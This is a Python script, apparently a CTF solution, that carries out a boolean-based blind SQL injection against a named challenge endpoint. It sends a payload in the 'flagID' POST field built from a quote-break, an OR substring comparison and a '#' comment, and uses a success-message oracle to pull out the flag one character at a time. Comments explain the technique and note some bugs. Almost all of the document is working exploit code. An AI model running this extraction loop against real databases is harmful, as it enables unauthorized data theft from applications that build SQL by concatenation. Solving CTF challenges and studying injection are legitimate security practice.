Blind SQLi

from requests import get,post,Session
from string import printable

# Boolean-based blind SQL injection against the CTF challenge endpoint:
# the page never echoes data, so each request asks one yes/no question
# ("is character N of the flag equal to X?") and the answer is read from
# whether the success message appears in the response body.
url = "http://challenges.unitedctf.ca:18000/challenge3.php"

# Oracle string (French: "Your query returned at least one result").
# Its presence in the response is the only signal the script uses.
good = "Votre requête a retourné au moins un résultat"
# Recovered characters, one slot per position; unused slots stay ''.
flag: list[str] = [''] * 100
# Index of the next flag position to recover (0-based); also the count found so far.
char_found: int = 0
# NOTE(review): assigned here but never read or updated below.
no_char_found: int = 0
with Session() as s:
  while True:
    # Try every candidate character for the current position until one matches.
    # NOTE(review): string.printable also contains "'" and "\", which would
    # break the quoting of the injected query rather than test a character,
    # and if no candidate matches this position the for-loop simply ends and
    # the outer while-loop repeats forever with char_found unchanged.
    for char in printable:
      data = {}
      # Payload sent in the "flagID" POST field: closes the server's string
      # literal, ORs in a one-character comparison on the `flag` column
      # (positions are 1-based in substring), COLLATE utf8mb4_bin forces a
      # binary (case-sensitive) comparison, and "#" comments out the rest of
      # the original statement.  This works only because the server builds
      # SQL by string concatenation; a parameterized query would treat the
      # whole value as data and the oracle would never fire.
      data["flagID"] = f"' or substring(flag,{char_found + 1},1) = '{char}' COLLATE utf8mb4_bin#"

      if good in s.post(url,data=data).text:
        # Match: record the character and advance to the next position.
        flag[char_found] = char
        char_found += 1
        break
      # Progress display: current prefix plus the candidate being tested,
      # overwritten in place via "\r".
      print(''.join(flag)+char,end="\r")
    # Hard-coded expected flag length; the script assumes exactly 60 characters.
    if len(''.join(flag)) == 60:
      print(''.join(flag),end="\r\n")
      break
